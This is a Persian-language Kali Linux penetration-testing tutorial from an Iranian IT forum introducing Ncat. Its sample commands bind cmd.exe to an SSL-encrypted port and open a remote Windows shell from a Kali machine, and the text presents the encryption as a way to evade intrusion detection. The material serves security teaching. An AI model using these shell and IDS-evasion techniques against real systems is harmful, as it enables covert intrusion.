آموزش کالی لینوکس قسمت 6 : Netcat چیست؟

در ادامه سری مباحث تست نفوذ با کالی و معرفی ابزار Netcat، در این قسمت میخواهیم تا ابزار مفید دیگری به نام Ncat را بشما معرفی کنیم که عملکرد آن با تفاوت هایی کوچک ولی بسیار مهم، شبیه ابزار Netcat میباشد. در ادامه به توضیح این تفاوت ها میپردازیم : Ncat را در تعاریف به عنوان خصوصیتی ذکر کرده اند که در آن بسیاری از مولفه های شبکه ای که از طریق خط فرمان قابلیت خواندن و نوشتن بر روی داده های تحت شبکه را دارند، در یک مجموعه کنار هم گرد آورده است. در حقیقت Ncat به عنوان پیاده سازی‌ مجدد و بهینه شده ای از برنامه اصلی Netcat برای پروژه Nmap نوشته شده است.

از دید اجرا کنندگان تست نفوذ، یکی از مهمترین نقاط ضعف Netcat، این است که این ابزار فاقد توانایی در احراز هویت و رمزنگاری ارتباطات ورودی و خروجی است. این خصوصیت یکی از مهمترین لایه های امنیتی را در حین اجرای تست نفوذ با استفاده از چنین ابزاری، ایفاء میکند. در حالی که صدور اجازه احراز هویت بر روی شل بایند شده و یا معکوس این اطمینان را میدهد تا استفاده از چنین ابزاری، سیستم نفوذ شده را در معرض آدرس های IP ناخواسته قرار نمیدهد، رمزنگاری یک شل بایند شده و یا معکوس نیز به نفوذ گر کمک خواهد کرد تا از سیستم های IDS فرار کند.

Ncat تمام این خصوصیات را در خود جای داده است. اگر ممکن باشد، استفاده از ابزاری چون Ncat و یا sbd، نسبت به Netcat در اولویت قرار میگیرند. به عنوان مثال، با توجه به سناریوی مطرح شده در مقاله پیش ()، ncat میتواند به همان طریق یک شل را بین محمد و حامد به روشی امن تر بایند کند. با توجه به سناریو قبل، حامد میتواند با استفاده از Ncat یک ارتباط رمز شده SSL را بر روی پورت 4444 ایجاد کرده و فقط به IP سیستم محمد ( 10.0.0.4) اجازه وصل شدن به آن را بدهد:

C:\Users\offsec>ncat --exec cmd.exe  --allow 10.0.0.4  -vnl  4444  --ssl 
Ncat: Version 5.59BETA1  (http://nmap.org/ncat)
Ncat: Generating a temporary 1024-bit RSA key.
Ncat: SHA-1 fingerprint: 1FC9  A338 0B1F 4AE5  897A  375F   404E  8CB1   12FA   DB94
Ncat:  Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.4:43500.

در مقابل، محمد میخواهد به IP پابلیک سیستم حامد که SSL آن فعال است، وصل شود و از طرفی از شنود و شناسایی توسط سیستم IDS پرهیز کند:

root@kali:~# ncat –v 10.0.0.22 4444 --ssl
Ncat: Version 6.25 (http://nmap.org/ncat)
Ncat: SSL connection to 10.0.0.22:4444.
Ncat: SHA-1 fingerprint: 1FC9 A338 0B1F 4AE5  897A  375F   404E  8CB1   12FA   DB94
Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\offsec>

توصیه میشود که زمان لازم برای آشنایی و یادگیری بیشتر با ابزار Ncat و sbd را کنار بگذارید چرا که این دو ابزار در دنیای تست نفوذ بسیار پرکاربرد و مفید هستند.سربلند و مانا باشید.

نویسنده: احسان امجدی

منبع: انجمن تخصصی فناوری اطلاعات ایران

هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.

عنوان
1 آموزش کالی لینوکس قسمت 1 : آموزش مدیریت و اجرای سرویس ها رایگان
2 آموزش کالی لینوکس قسمت 2 : آشنایی با محیط اسکریپت نویسی BASH رایگان
3 آموزش کالی لینوکس قسمت 3 : آشنایی با محیط اسکریپت نویسی BASH رایگان
4 آموزش کالی لینوکس قسمت 4 : آموزش NetCat بخش 1 رایگان
5 آموزش کالی لینوکس قسمت 5 : آموزش NetCat بخش 2 رایگان
6 آموزش کالی لینوکس قسمت 6 : Netcat چیست؟ رایگان
7 آموزش کالی لینوکس قسمت 7 : معرفی ابزار وایرشارک (Wireshark) رایگان
زمان و قیمت کل 0″ 0
0 نظر

هیچ نظری ارسال نشده است! اولین نظر برای این مطلب را شما ارسال کنید...

نظر شما
برای ارسال نظر باید وارد شوید.
از سرتاسر توسینسو
تنظیمات حریم خصوصی
تائید صرفنظر
×

تو می تونی بهترین نتیجه رو تضمینی با بهترین های ایران بدست بیاری ، پس مقایسه کن و بعد خرید کن : فقط توی جشنواره پاییزه می تونی امروز ارزونتر از فردا خرید کنی ....